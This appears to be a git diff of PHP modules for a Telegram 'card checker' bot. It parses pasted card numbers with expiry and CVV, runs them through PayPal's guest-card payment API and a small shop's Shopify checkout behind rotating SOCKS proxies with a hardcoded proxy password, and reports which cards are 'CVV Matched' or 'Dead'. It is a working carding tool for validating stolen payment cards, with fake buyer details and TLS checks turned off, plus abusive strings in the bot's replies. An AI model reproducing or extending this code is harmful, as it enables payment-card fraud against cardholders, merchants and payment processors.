+curl_setopt($ch, CURLOPT_URL, 'https://www.paypal.com/smart/card-fields?sessionID=uid_6dcaad7bb7_mta6ntu6mzy&buttonSessionID=uid_12a7c56fda_mta6ntg6mde&locale.x=en_US&commit=true&env=production&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&disable-card=&token=EC-3NT75172S6225680U');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$headers = array();
+$headers[] = 'authority: www.paypal.com';
+$headers[] = 'method: GET';
+$headers[] = 'path: /smart/card-fields?sessionID=uid_6dcaad7bb7_mta6ntu6mzy&buttonSessionID=uid_12a7c56fda_mta6ntg6mde&locale.x=en_US&commit=true&env=production&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&disable-card=&token=EC-3NT75172S6225680U';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9';
+$headers[] = 'accept-language: en-US,en;q=0.9';
+$headers[] = 'referer: https://www.paypal.com/smart/buttons?style.label=checkout&style.layout=vertical&style.color=gold&style.shape=rect&style.tagline=false&style.height=45&components.0=buttons&components.1=messages&locale.lang=en&locale.country=US&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&clientID=AUESd5dCP7FmcZnzB7v32UIo-gGgnJupvdfLle9TBJwOC4neACQhDVONBv3hc1W-pXlXS6G-KA5y4Kzv&sdkCorrelationID=f53694928f373&storageID=uid_36f9fe73ae_mta6ntu6mzy&sessionID=uid_6dcaad7bb7_mta6ntu6mzy&buttonSessionID=uid_12a7c56fda_mta6ntg6mde&env=production&fundingEligibility=eyJwYXlwYWwiOnsiZWxpZ2libGUiOnRydWUsInZhdWx0YWJsZSI6dHJ1ZX0sInBheWxhdGVyIjp7ImVsaWdpYmxlIjp0cnVlLCJtZXJjaGFudENvbmZpZ0hhc2giOiIzZjBjZTQyY2I4M2FiZmRhY2NhYzM0NmNmMmM3YmNhYTMzNDE1MGRlIiwicHJvZHVjdHMiOnsicGF5SW40Ijp7ImVsaWdpYmxlIjpmYWxzZSwidmFyaWFudCI6bnVsbH0sInBheWxhdGVyIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXJpYW50IjpudWxsfX19LCJjYXJkIjp7ImVsaWdpYmxlIjp0cnVlLCJicmFuZGVkIjpmYWxzZSwiaW5zdGFsbG1lbnRzIjpmYWxzZSwidmVuZG9ycyI6eyJ2aXNhIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJtYXN0ZXJjYXJkIjp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJhbWV4Ijp7ImVsaWdpYmxlIjp0cnVlLCJ2YXVsdGFibGUiOnRydWV9LCJkaXNjb3ZlciI6eyJlbGlnaWJsZSI6dHJ1ZSwidmF1bHRhYmxlIjp0cnVlfSwiaGlwZXIiOnsiZWxpZ2libGUiOmZhbHNlLCJ2YXVsdGFibGUiOmZhbHNlfSwiZWxvIjp7ImVsaWdpYmxlIjpmYWxzZSwidmF1bHRhYmxlIjp0cnVlfSwiamNiIjp7ImVsaWdpYmxlIjpmYWxzZSwidmF1bHRhYmxlIjp0cnVlfX0sImd1ZXN0RW5hYmxlZCI6dHJ1ZX0sInZlbm1vIjp7ImVsaWdpYmxlIjpmYWxzZX0sIml0YXUiOnsiZWxpZ2libGUiOmZhbHNlfSwiY3JlZGl0Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImFwcGxlcGF5Ijp7ImVsaWdpYmxlIjpmYWxzZX0sInNlcGEiOnsiZWxpZ2libGUiOmZhbHNlfSwiaWRlYWwiOnsiZWxpZ2libGUiOmZhbHNlfSwiYmFuY29udGFjdCI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJnaXJvcGF5Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImVwcyI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJzb2ZvcnQiOnsiZWxpZ2libGUiOmZhbHNlfSwibXliYW5rIjp7ImVsaWdpYmxlIjpmYWxzZX0sInAyNCI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJ6aW1wbGVyIjp7ImVsaWdpYmxlIjpmYWxzZX0sIndlY2hhdHBheSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJwYXl1Ijp7ImVsaWdpYmxlIjpmYWxzZX0sImJsaWsiOnsiZWxpZ2libGUiOmZhbHNlfSwidHJ1c3RseSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJveHhvIjp7ImVsaWdpYmxlIjpmYWxzZX0sIm1heGltYSI6eyJlbGlnaWJsZSI6ZmFsc2V9LCJib2xldG8iOnsiZWxpZ2libGUiOmZhbHNlfSwibWVyY2Fkb3BhZ28iOnsiZWxpZ2libGUiOmZhbHNlfX0&platform=desktop&experiment.enableVenmo=false&experiment.disablePaylater=false&flow=purchase¤cy=USD&intent=capture&commit=true&vault=false&merchantID.0=UHALZ2245EDV6&renderedButtons.0=paypal&renderedButtons.1=paylater&renderedButtons.2=card&debug=false&applePaySupport=false&supportsPopups=true&supportedNativeBrowser=false&allowBillingPayments=true';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: iframe';
+$headers[] = 'sec-fetch-mode: navigate';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'upgrade-insecure-requests: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'sessionID=uid_6dcaad7bb7_mta6ntu6mzy&buttonSessionID=uid_12a7c56fda_mta6ntg6mde&locale.x=en_US&commit=true&env=production&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&disable-card=&token='.$token.'');
+$get3 = curl_exec($ch);
+
+
+//==============[ 1st req ]==============//
+$ch = curl_init();
+curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
+ curl_setopt($ch, CURLOPT_PROXY, $proxy[array_rand($proxy)]);
+ curl_setopt($ch, CURLOPT_PROXYUSERPWD, "sfbnu0lx-3nzx7fk:exqwdzhv32");
+curl_setopt($ch, CURLOPT_URL, 'https://www.paypal.com/graphql?fetch_credit_form_submit');
+curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+curl_setopt($ch, CURLOPT_POST, 1);
+$headers = array();
+$headers[] = 'authority: www.paypal.com';
+$headers[] = 'method: POST';
+$headers[] = 'path: /graphql?fetch_credit_form_submit';
+$headers[] = 'scheme: https';
+$headers[] = 'accept: */*';
+$headers[] = 'accept-language: en-US,en;q=0.9,hi;q=0.8,bn;q=0.7';
+$headers[] = 'content-type: application/json';
+$headers[] = 'origin: https://www.paypal.com';
+$headers[] = 'paypal-client-context: '.$token.'';
+$headers[] = 'paypal-client-metadata-id: '.$token.'';
+$headers[] = 'referer: https://www.paypal.com/smart/card-fields?sessionID=uid_0580164318_mta6mzk6nte&buttonSessionID=uid_6dc1213f73_mta6nda6nde&locale.x=en_US&commit=true&env=production&sdkMeta=eyJ1cmwiOiJodHRwczovL3d3dy5wYXlwYWwuY29tL3Nkay9qcz9jbGllbnQtaWQ9QVVFU2Q1ZENQN0ZtY1puekI3djMyVUlvLWdHZ25KdXB2ZGZMbGU5VEJKd09DNG5lQUNRaERWT05CdjNoYzFXLXBYbFhTNkctS0E1eTRLenYmY3VycmVuY3k9VVNEJm1lcmNoYW50LWlkPVVIQUxaMjI0NUVEVjYmY29tbWl0PXRydWUmY29tcG9uZW50cz1idXR0b25zLG1lc3NhZ2VzJmludGVudD1jYXB0dXJlJmxvY2FsZT1lbl9VUyIsImF0dHJzIjp7ImRhdGEtdWlkIjoidWlkX2JuamRzZWh0bHJha2pkbGZpc3pmdmRoeGFlZXF0cCJ9fQ&disable-card=&token=EC-5FS8055486889604B';
+$headers[] = 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"';
+$headers[] = 'sec-ch-ua-mobile: ?0';
+$headers[] = 'sec-ch-ua-platform: "Windows"';
+$headers[] = 'sec-fetch-dest: empty';
+$headers[] = 'sec-fetch-mode: cors';
+$headers[] = 'sec-fetch-site: same-origin';
+$headers[] = 'sec-gpc: 1';
+$headers[] = 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36';
+$headers[] = 'x-app-name: standardcardfields';
+$headers[] = 'x-country: US';
+curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
+curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '{"query":"\n mutation payWithCard(\n $token: String!\n $card: CardInput!\n $phoneNumber: String\n $firstName: String\n $lastName: String\n $shippingAddress: AddressInput\n $billingAddress: AddressInput\n $email: String\n $currencyConversionType: CheckoutCurrencyConversionType\n $installmentTerm: Int\n ) {\n approveGuestPaymentWithCreditCard(\n token: $token\n card: $card\n phoneNumber: $phoneNumber\n firstName: $firstName\n lastName: $lastName\n email: $email\n shippingAddress: $shippingAddress\n billingAddress: $billingAddress\n currencyConversionType: $currencyConversionType\n installmentTerm: $installmentTerm\n ) {\n flags {\n is3DSecureRequired\n }\n cart {\n intent\n cartId\n buyer {\n userId\n auth {\n accessToken\n }\n }\n returnUrl {\n href\n }\n }\n paymentContingencies {\n threeDomainSecure {\n status\n method\n redirectUrl {\n href\n }\n parameter\n }\n }\n }\n }\n ","variables":{"token":"'.$token.'","card":{"cardNumber":"'.$cc.'","expirationDate":"'.$mm.'/'.$yyyy.'","postalCode":"10080","securityCode":"'.$cvv.'"},"phoneNumber":"4139290139","firstName":"Gey","lastName":"Paypal","billingAddress":{"givenName":"Gey","familyName":"Paypal","line1":null,"line2":null,"city":null,"state":null,"postalCode":"10080","country":"US"},"email":"'.$email.'","currencyConversionType":"PAYPAL"},"operationName":null}');
+$curl1 = curl_exec($ch);
+
+//Trimming The Response
+$error = trim(strip_tags(getStr($curl1,'"code":"','"')));
+
+$msg = trim(strip_tags(getStr($curl1,'"message":"','"')));
+$info = curl_getinfo($ch);
+$time = $info['total_time'];
+$time = substr_replace($time, '',4);
+curl_close($ch);
+
+echo "Response: $error
";
+
+//echo "Message: $msg
";
+
+//echo "Token: $token
";
+
+
+
+######################END OF CHECKER PART################################################################################
+
+
+ if(substr_count($curl1, '"INVALID_BILLING_ADDRESS"')) {
+ addTotal();
+ addUserTotal($userId);
+ addCVV();
+ addUserCVV($userId);
+ addCCN();
+ addUserCCN($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+Status -» CVV Matched [ AVS FAILURE ] ✅
+Response -» Approved ( INVALID_BILLING_ADDRESS )
+Gateway -» Paypal
+IP -» Proxy [$ip]
+Time -» $times
+
+------- Bin Info -------
+Bank -» $bank
+Brand -» $schemename
+Type -» $typename
+Currency -» $currency
+Country -» $cname ($emoji - 💲$currency)
+Issuers Contact -» $phone
+----------------------------
+
+Checked By $firstname
+Bot By: [ ARC Σ US ]",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ elseif(substr_count($curl1, 'EXISTING_ACCOUNT_RESTRICTED')) {
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» CVV Matched [Card Already Added To Another] ✅
+ Response -» Approved (EXISTING_ACCOUNT_RESTRICTED)
+ Gateway -» Paypal
+ IP -» Proxy [$ip]
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ else{
+ addTotal();
+ addUserTotal($userId);
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Card: $lista
+ Status -» Dead ❌
+ Response -» $error
+ Gateway -» Paypal
+ Time -» $times
+
+ ------- Bin Info -------
+ Bank -» $bank
+ Brand -» $schemename
+ Type -» $typename
+ Currency -» $currency
+ Country -» $cname ($emoji - 💲$currency)
+ Issuers Contact -» $phone
+ ----------------------------
+
+ Checked By $firstname
+ Bot By: Mabidax",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);}
+
+ }else{
+ bot('editMessageText',[
+ 'chat_id'=>$chat_id,
+ 'message_id'=>$messageidtoedit,
+ 'text'=>"Cool! Fucking provide a CC to Check!!",
+ 'parse_mode'=>'html',
+ 'disable_web_page_preview'=>'true'
+
+ ]);
+ }
+ }
+}
+
+
+?>
\ No newline at end of file
diff --git a/modules/checker/schk.php b/modules/checker/schk.php
index 723c689..601f3f4 100644
--- a/modules/checker/schk.php
+++ b/modules/checker/schk.php
@@ -17,14 +17,14 @@
////////////====[MUTE]====////////////
-if(strpos($message, "/schk ") === 0 || strpos($message, "!schk ") === 0){
+if(strpos($message, "/sch ") === 0 || strpos($message, ".sch") === 0){
$antispam = antispamCheck($userId);
addUser($userId);
if($antispam != False){
bot('sendmessage',[
'chat_id'=>$chat_id,
- 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'text'=>"[Chala Ja Bsdk] Try again after $antispams.",
'parse_mode'=>'html',
'reply_to_message_id'=> $message_id
]);
@@ -136,7 +136,7 @@
'message_id'=>$messageidtoedit,
'text'=>"Card: $lista
Status -» Dead ❌
-Response -» SK Key is Dead
+Response -» Ma MA Mar Gaya Madarchod
Gateway -» Stripe Auth 1
Time -» $times
@@ -150,7 +150,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: [ ARC Σ US ]",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -218,7 +218,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
@@ -247,7 +247,7 @@
----------------------------
Checked By $firstname
-Bot By: ɴɪɴᴊᴀ ɴᴀᴠᴇᴇɴ",
+Bot By: Mabidax",
'parse_mode'=>'html',
'disable_web_page_preview'=>'true'
diff --git a/modules/checker/sh2.php b/modules/checker/sh2.php
new file mode 100644
index 0000000..63bc907
--- /dev/null
+++ b/modules/checker/sh2.php
@@ -0,0 +1,527 @@
+$chat_id,
+ 'text'=>"[ANTI SPAM] Try again after $antispams.",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+ ]);
+ return;
+
+ }else{
+ $messageidtoedit1 = bot('sendmessage',[
+ 'chat_id'=>$chat_id,
+ 'text'=>"Wait for Result...",
+ 'parse_mode'=>'html',
+ 'reply_to_message_id'=> $message_id
+
+ ]);
+
+ $messageidtoedit = capture(json_encode($messageidtoedit1), '"message_id":', ',');
+ $lista = substr($message, 4);
+ $bin = substr($cc, 0, 6);
+
+ if(preg_match_all("/(\d{16})[\/\s:|]*?(\d\d)[\/\s|]*?(\d{2,4})[\/\s|-]*?(\d{3})/", $lista, $matches)) {
+ $creditcard = $matches[0][0];
+ $cc = multiexplode(array(":", "|", "/", " "), $creditcard)[0];
+ $mes = multiexplode(array(":", "|", "/", " "), $creditcard)[1];
+ $ano = multiexplode(array(":", "|", "/", " "), $creditcard)[2];
+ $cvv = multiexplode(array(":", "|", "/", " "), $creditcard)[3];
+ $c1 = substr($cc, 0, 4);
+ $c2 = substr($cc, 4, 4);
+ $c3 = substr($cc, 8, 4);
+ $c4 = substr($cc, -4);
+
+
+##########################################################CHECKER PART#######################################################
+
+ /////////////////////////////////////////////////////////////////////////////////////
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, 'https://lookup.binlist.net/'.$cc.'');
+ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
+ curl_setopt($ch, CURLOPT_HTTPHEADER, array(
+ 'Host: lookup.binlist.net',
+ 'Cookie: _ga=GA1.2.549903363.1545240628; _gid=GA1.2.82939664.1545240628',
+ 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'));
+ curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_POSTFIELDS, '');
+ $fim = curl_exec($ch);
+ $bank = capture($fim, '"bank":{"name":"', '"');
+ $cname = capture($fim, '"name":"', '"');
+ $brand = capture($fim, '"brand":"', '"');
+ $country = capture($fim, '"country":{"name":"', '"');
+ $phone = capture($fim, '"phone":"', '"');
+ $scheme = capture($fim, '"scheme":"', '"');
+ $type = capture($fim, '"type":"', '"');
+ $emoji = capture($fim, '"emoji":"', '"');
+ $currency = capture($fim, '"currency":"', '"');
+ $binlenth = strlen($bin);
+ $schemename = ucfirst("$scheme");
+ $typename = ucfirst("$type");
+
+
+ /////////////////////==========[Unavailable if empty]==========////////////////
+
+
+ if (empty($schemename)) {
+ $schemename = "Unavailable";
+ }
+ if (empty($typename)) {
+ $typename = "Unavailable";
+ }
+ if (empty($brand)) {
+ $brand = "Unavailable";
+ }
+ if (empty($bank)) {
+ $bank = "Unavailable";
+ }
+ if (empty($cname)) {
+ $cname = "Unavailable";
+ }
+ if (empty($phone)) {
+ $phone = "Unavailable";
+ }
+ ///////////////////////////////////////////////////////////////////////////////////////////////////////
+ @unlink('cookie.txt');
+ error_reporting(0);
+ date_default_timezone_get('America/Buenos_Aires');
+
+ function GetStr($string, $start, $end){
+ $str = explode($start, $string);
+ $str = explode($end, $str[1]);
+ return $str[0];
+ }
+ function multiexplode($seperator, $string){
+ $one = str_replace($seperator, $seperator[0], $string);
+ $two = explode($seperator[0], $one);
+ return $two;
+ }
+
+ function Capture($str, $starting_word, $ending_word){
+ $subtring_start = strpos($str, $starting_word);
+ $subtring_start += strlen($starting_word);
+ $size = strpos($str, $ending_word, $subtring_start) - $subtring_start;
+ return substr($str, $subtring_start, $size);
+ };
+
+
+ if (number_format($mes) < 10){$mes = str_replace("0", "", $mes);};
+
+ if (!file_exists(getcwd().'/Cookies')) mkdir(getcwd().'/Cookies', 0777, true);
+ $dexy = getcwd().'/Cookies/shin'.uniqid('obu', true).'.txt';
+
+
+
+ #------[Winscribe]------#
+
+ $proxy = [
+ 'socks-us.windscribe.com:1080',
+ 'socks-nl.windscribe.com:1080',
+ ];
+
+ if (isset($proxy)){
+ $ip = "Proxy Live ✅";
+ }
+ if (empty($proxy)){
+ $ip = "Proxy Dead ❌";
+ }
+ //echo '['.$ip.']
';
+
+ #------[Rand]------#
+
+ $DET = file_get_contents("https://randomuser.me/api/1.2/?nat=us");
+ $first = trim(strip_tags(getStr($DET,'"first":"','"')));
+ $last = trim(strip_tags(getStr($DET,'"last":"','"')));
+ $street = trim(strip_tags(getStr($DET,'"street":"','"')));
+ $city = trim(strip_tags(getStr($DET,'"city":"','"')));
+ $state = trim(strip_tags(getStr($DET,'"state":"','"')));
+ $Zip = trim(strip_tags(getStr($DET,'"postcode":',',"')));
+ $seed = trim(strip_tags(getStr($DET,'"seed":"','"')));
+
+#------[CURL-1]------#
+
+$ch = curl_init("https://everythingsummercamp.com/collections/girls-socks");
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$Headers = ['authority: everythingsummercamp.com',
+'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl1 = curl_exec($ch);
+
+#------[CURL-]------#
+
+$ch = curl_init("https://everythingsummercamp.com/cart/add.js");
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
+$Headers = ['authority: everythingsummercamp.com',
+'content-type: application/x-www-form-urlencoded; charset=UTF-8',
+'origin: https://everythingsummercamp.com',
+'Referer: https://everythingsummercamp.com/collections/girls-socks/products/wicking-athletic-socks?variant=15511254073459',
+'referer: https://everythingsummercamp.com/',
+'x-requested-with: XMLHttpRequest',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'new_item=false&closeout=false&x_left=false&best_seller=false&quantity=1&id=15511254073459&option-0=Dark+Green&option-1=Size+9-11');
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl3 = curl_exec($ch);
+
+#------[CURL]------#
+
+$ch = curl_init("https://everythingsummercamp.com/cart.js");
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$Headers = ['authority: everythingsummercamp.com',
+'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+'referer: https://everythingsummercamp.com/collections/girls-socks/products/wicking-athletic-socks?variant=15511254073459',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl5 = curl_exec($ch);
+
+
+#------[CURL]------#
+
+$ch = curl_init("https://everythingsummercamp.com/cart");
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
+$Headers = ['authority: everythingsummercamp.com',
+'content-type: application/x-www-form-urlencoded',
+'origin: https://everythingsummercamp.com',
+'referer: https://everythingsummercamp.com/collections/girls-socks/products/wicking-athletic-socks?variant=15511254073459',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_POSTFIELDS, 'updates%5B%5D=1¬e=&checkout=');
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_HEADER, 1);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl6 = curl_exec($ch);
+$Location = Capture($curl6, 'location:', 'strict-transport-security');
+$id_1 = trim(strip_tags(getStr($Location,'https://everythingsummercamp.com/','/checkouts/')));
+$id_2 = trim(strip_tags(getStr($Location,'/checkouts/','x-sorting-hat-podid:')));
+echo "Location: $Location
";
+
+echo "Key 1:$id_1
";
+
+echo "Key 2:$id_2
";
+#------[CURL-7]------#
+
+$ch = curl_init('https://everythingsummercamp.com/'.$id_1.'/checkouts/'.$id_2.'');
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'GET');
+$Headers = ['authority: everythingsummercamp.com',
+'accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+'referer: https://everythingsummercamp.com/collections/girls-socks/products/wicking-athletic-socks?variant=15511254073459',
+'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',];
+curl_setopt($ch, CURLOPT_HTTPHEADER, $Headers);
+curl_setopt($ch, CURLOPT_HEADER, 1);
+curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_COOKIEFILE, $dexy);
+curl_setopt($ch, CURLOPT_COOKIEJAR, $dexy);
+$curl7 = curl_exec($ch);
+$authenticity_token = trim(strip_tags(getStr($curl7,'input type="hidden" name="authenticity_token" value="','"')));
+
+#------[CURL-8]------#
+
+$ch = curl_init('https://everythingsummercamp.com/'.$id_1.'/checkouts/'.$id_2.'');
+curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
+$Headers = ['authority: everythingsummercamp.com',
